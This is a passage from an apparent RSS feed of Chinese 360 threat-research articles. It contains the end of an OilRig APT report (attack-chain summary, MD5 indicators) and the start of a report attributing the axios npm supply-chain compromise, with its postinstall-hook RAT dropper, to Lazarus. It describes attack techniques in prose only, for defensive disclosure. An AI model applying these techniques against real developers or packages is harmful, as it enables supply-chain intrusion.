leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">综上所述，将本次攻击归属到APT-C-49（OilRig）组织。</span></p><div data-role="outer" style="margin: 0px;padding: 0px;box-sizing: border-box;"><div data-tools="135编辑器" data-id="101849" style="margin: 0px;padding: 0px;box-sizing: border-box;"><div style="margin: 10px 0px;padding: 0px;box-sizing: border-box;"><div style="margin: 0px 0px -15px;padding: 0px;display: flex;box-sizing:border-box;transform: rotate(0deg);-webkit-transform: rotate(0deg);-moz-transform: rotate(0deg);-o-transform: rotate(0deg);"><p data-brushtype="text" style="margin: 16px 0px 0px;padding: 0px 1em;color: rgb(242, 242, 242);line-height: 32px;height: 32px;font-size: 16px;background-color: rgb(190, 25, 31);letter-spacing: 1.5px;box-sizing: border-box;"><strong style="margin-right: 0px;margin-bottom: 0px;margin-left: 0px;padding: 0px;"><span style="margin-right: 0px;margin-bottom: 0px;margin-left: 0px;padding: 0px;font-size: 17px;"><span leaf="">总结</span></span></strong></p></div><div style="margin: 0px 0px 0px 6px;padding: 30px 15px 10px;background-color: #f2f2f2;flex-shrink: 0;box-sizing: border-box;"><div data-autoskip="1" style="margin: 0px;padding: 0px;line-height: 1.75em;letter-spacing: 1.5px;font-size: 17px;box-sizing: border-box;"><div style="margin: 0px;padding: 0px;text-indent: 2em;box-sizing: border-box;"><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="background-color: rgb(242, 242, 242);flex-shrink: 0;box-sizing: border-box;text-indent: 2em;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">APT-C-49（OilRig）近年来持续对其攻击链进行演进与升级，整体呈现出对抗能力增强与执行方式现代化的趋势。该组织由早期依赖 Excel宏触发的Saitama loader，逐步演进为结合宏混淆重构、云服务滥用与隐写技术的多阶段攻击链，并在后续阶段明显向无文件与内存执行模式转型。通过利用 Google Drive、GitHub、Telegram 等合法平台进行配置分发与C2通信，OilRig有效</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">降低了静态与行为检测暴露面，体现出其针对 EDR 与云环境监测的持续适应能力。</span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">此外本文披露的样本只是该组织攻击过程中使用的部分载荷，通过对样本进行的深入分析，希望帮助用户了解此类攻击链条及防范手段。同时也提醒用户提高安全意识，在日常工作中谨慎处理未知压缩包、邮件附件和超链接，避免因轻信而在毫无防护的情况下遭受入侵，造成敏感信息和重要数据的泄露。   </span></p></div></div></div></div></div></div><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div data-role="title" data-tools="135编辑器" data-id="85638" style=""><div style="margin: 2em auto 0px;padding: 0.5em 0px;white-space: normal;border-right: none;border-bottom: none;border-left: none;border-image: initial;border-top: 1px solid #cccccc;display: block;font-size: 15px;font-style: normal;font-weight: inherit;text-decoration: inherit;color: #a6a6a6;box-sizing: border-box;font-family:inherit;"><p style="margin-top: -1.2em;text-align: center;padding: 0px;border: none;line-height: 1.4;box-sizing: border-box;"><span style="font-size:15px;"><strong><span style="background-color: #0f0f19;border-color: #b7b8b8;color: #ffffff;font-style: normal;padding: 8px 23px;text-align: center;text-decoration: inherit;font-family:inherit;"><span leaf="">附录 IOC</span></span></strong></span></p></div></div></div><p style="margin-top: 8px;margin-bottom: 8px;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin-right: 0px;margin-left: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 15px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;box-sizing: border-box !important;overflow-wrap: break-word !important;" data-pm-slice="0 0 []"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin-right: 0px;margin-left: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin-right: 0px;margin-left: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">MD5</span></span></strong></p><p style="text-indent: 0px;margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mnphhg3ybhw">717da2804144e9759c4e6409f18b7b4b</span></p><p style="text-indent: 0px;margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mnphhg3y6ea">07aa715f8a6f56a96476aae0ebca17c7</span></p><p style="text-indent: 0px;margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mnphhg3yrn2">d0d17a50422e3d4a0a50fed0878a47d6</span></p><p style="text-indent: 0px;margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mnphhg3yjja">ca002f49f3d5ee36ded21e235e8d04e7</span></p><p style="text-indent: 0px;margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mnphhg3y1ior">9c0409be11a6c4433896db58e7095464</span></p><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div data-role="title" data-tools="135编辑器" data-id="85638" style=""><div style="margin: 2em auto 0px;padding: 0.5em 0px;white-space: normal;border-right: none;border-bottom: none;border-left: none;border-image: initial;border-top: 1px solid #cccccc;display: block;font-size: 15px;font-style: normal;font-weight: inherit;text-decoration: inherit;color: #a6a6a6;box-sizing: border-box;font-family:inherit;"><p style="margin-top: -1.2em;text-align: center;padding: 0px;border: none;line-height: 1.4;box-sizing: border-box;"><span style="font-size:15px;"><strong><span style="background-color: #0f0f19;border-color: #b7b8b8;color: #ffffff;font-style: normal;padding: 8px 23px;text-align: center;text-decoration: inherit;font-family:inherit;"><span leaf="">参考</span></span></strong></span></p></div></div></div><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;" data-mpa-action-id="mnphhonx1et1" data-pm-slice="0 0 []"><span mpa-font-style="mnphhonlke2" style="font-size: 15px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">https</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">:</span><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 0.0pt;margin-bottom: 0.0pt;text-align: justify;text-justify: inter-ideograph;line-height: normal;mso-pagination: none;font-size: 10.5pt;mso-bidi-font-size: 11.0pt;font-family: 等线;mso-fareast-font-family: &#39;等线&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;mso-list: l8 level1 lfo1;margin-left: 21.0pt;text-indent: -21.0pt;mso-char-indent-count: 0;mso-char-indent-size: 0pt;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:仿宋;mso-ascii-font-family:仿宋;mso-fareast-font-family:仿宋;font-variant:normal;text-transform:none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">//www.threatdown.com/blog/apt34-targets-jordan-government-using-new-saitama-backdoor/</span></span></p><div data-role="outer" label="Powered by 135editor.com" style="" data-pm-slice="0 0 []"><div data-tools="135编辑器" data-id="98507" style="margin: 0px;padding: 0px;color: #333333;font-size: 17px;text-align: justify;text-decoration-thickness: initial;box-sizing: border-box;font-family:mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><div style="margin: 10px auto;padding: 0px;text-align: center;line-height: 1.5em;box-sizing: border-box;"><div style="margin: 0px;padding: 0px 0px 3px;display: flex;justify-content: center;align-items: center;border-bottom: 1px solid #be191f;box-sizing: border-box;"><p data-brushtype="text" style="margin: 0px;padding: 0px 8px;font-size: 16px;letter-spacing: 1.5px;box-sizing:border-box;transform: rotate(0deg);-webkit-transform: rotate(0deg);-moz-transform: rotate(0deg);-o-transform: rotate(0deg);"><span style="margin: 0px;padding: 0px;font-size: 16px;"><strong style="margin: 0px;padding: 0px;"><span leaf="">团队介绍</span></strong></span></p></div></div><p style="margin: 0px;padding: 4px 0px;font-size: 12px;letter-spacing: 1.5px;line-height: 1.5em;text-align: center;box-sizing:border-box;transform: rotate(0deg);-webkit-transform: rotate(0deg);-moz-transform: rotate(0deg);-o-transform: rotate(0deg);"><span style="margin: 0px;padding: 0px;font-size: 12px;"><span leaf="">TEAM INTRODUCTION</span></span></p></div><div data-role="paragraph" style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-size: 17px;text-align: justify;text-decoration-thickness: initial;box-sizing: border-box;font-family:mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><p style="margin: 0px;padding: 0px;text-align: justify;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family:-apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="margin: 0px;padding: 0px;max-width: 100%;color: #be191f;font-size: 15px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="margin: 0px;padding: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="color: #be191f;margin: 0px;padding: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family:微软雅黑, sans-serif;"><span leaf="">360</span><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(190, 25, 31);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="4 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15px;color: rgb(190, 25, 31);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">高级威胁研究院</span></span></strong></span></span></strong></span></p><p style="margin: 0px;padding: 0px;text-align: justify;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family:-apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="margin: 0px;padding: 0px;max-width: 100%;color: #888888;font-size: 14px;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family:微软雅黑, sans-serif;"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(136, 136, 136);font-size: 14px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(136, 136, 136);font-size: 14px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></span></p></div><o:page></o:page></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=1a7fdb02&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247508255%26idx%3D1%26sn%3Db3b6cc3d274945427e44605621251b68">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 09 Apr 2026 18:02:00 +0800</pubDate>
    </item>
    <item>
      <title>Axios供应链攻击事件再追踪：线索直指Lazarus组织</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247508249&amp;idx=1&amp;sn=d50892ac7b48a52ff293889bb77c800f</link>
      <description>本次报告，我们继续对事件进行进一步的追踪披露，并结合360安全大脑的最新威胁情报数据，进一步开展归因分析</description>
      <content:encoded><![CDATA[<p><span>高级威胁研究院</span> <span>2026-04-01 20:16</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=15447853&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FEmmib7pWXrXLWo8qDhvtqibMj1gn3TQfXl6O4KQZEL4e8Z52WGaMlMw2AloxWrArao7ygNGib2mlMjO4sZc5ibDEDQbPUVjF2A03yUpYLmVsQrQ%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本次报告，我们继续对事件进行进一步的追踪披露，并结合360安全大脑的最新威胁情报数据，进一步开展归因分析</p>
  <div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div data-tools="135编辑器" data-id="16"><div style="background-color: #f5f5f4;border-color: #f5f5f4;color: #212122;border-radius: 4px;font-size: 17px;text-align: justify;letter-spacing: 1.5px;line-height: 1.75em;padding: 1em 0.8em;margin: 10px auto;box-sizing: border-box;"><p style="text-indent: 2em;margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">此前，我们发布了《</span><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247508054&amp;idx=1&amp;sn=53087fd771552eb8c5c0144dc7db8400&amp;scene=21#wechat_redirect" textvalue="Axios npm供应链攻击威胁分析报告" data-itemshowtype="0" linktype="text" data-linktype="2">Axios npm供应链攻击威胁分析报告</a><span textstyle="" style="font-size: 17px;">》，系统性披露了攻击者劫持维护者账号、在package[.]json中注入“幽灵依赖”plain-crypto-js@4[.]2.1、通过postinstall钩子释放跨平台RAT等核心技术细节，并给出了详细的时间线、IOC指标及应急响应建议，迅速成为行业内重要的参考资料。</span></span></p><p style="text-indent: 2em;margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">本次报告，我们继续对事件进行进一步的追踪披露，并结合360安全大脑的最新威胁情报数据，进一步开展归因分析。</span></span></p></div></div></div><p style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 18px;color: rgb(190, 25, 31);font-weight: bold;">一、</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 18px;color: rgb(190, 25, 31);font-weight: bold;">概述</span></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">axios是一个基于Promise的HTTP客户端，在JavaScript和Node.js 生态系统中被广泛使用。</span></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;text-align: justify;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">2026年3月30日，axios遭遇供应链攻击。攻击者成功劫持了维护者账户(jasonsaayman)，在npm官方仓库发布了两个恶意版本（axios@1[.]14.1和axios@0[.]30.4），通过注入恶意依赖plain-crypto-js@4[.]2.1，该包此前并不存在，且从未被axios代码实际导入。其唯一目的是执行一个安装后脚本，该脚本会释放并运行一个针对macOS、Windows和Linux的跨平台远程控制木马（RAT）。恶意版本在npm上存活约3小时后被下架。</span></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;text-align: justify;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">结合360安全大脑数据，我们将axios入侵事件与我们跟踪的一起Lazarus组织活动关联起来，二者使用多处相同的命名及相似代码结构。同时，axios入侵事件使用的样本与早期被披露的RustBucket恶意组件存在关联。因此我们认为此次axios入侵事件归属到Lazarus组织。</span></span><o:page></o:page></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;text-align: justify;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">Lazarus组织长期通过感染npm包的方式进行供应链攻击，依据以往攻击手法，攻击人员预先通过求职/招聘/面试等方式向开发人员投递钓鱼链接/被感染的工程项目，致使开发人员被攻击，随后攻击者再通过窃取开发人员账号发布被污染的工程项目，以实现供应链攻击。</span></span></p><h1 style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 18px;color: rgb(190, 25, 31);font-weight: bold;">二、</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 18px;color: rgb(190, 25, 31);font-weight: bold;">归属研判</span></span></h1><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;text-align: justify;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang 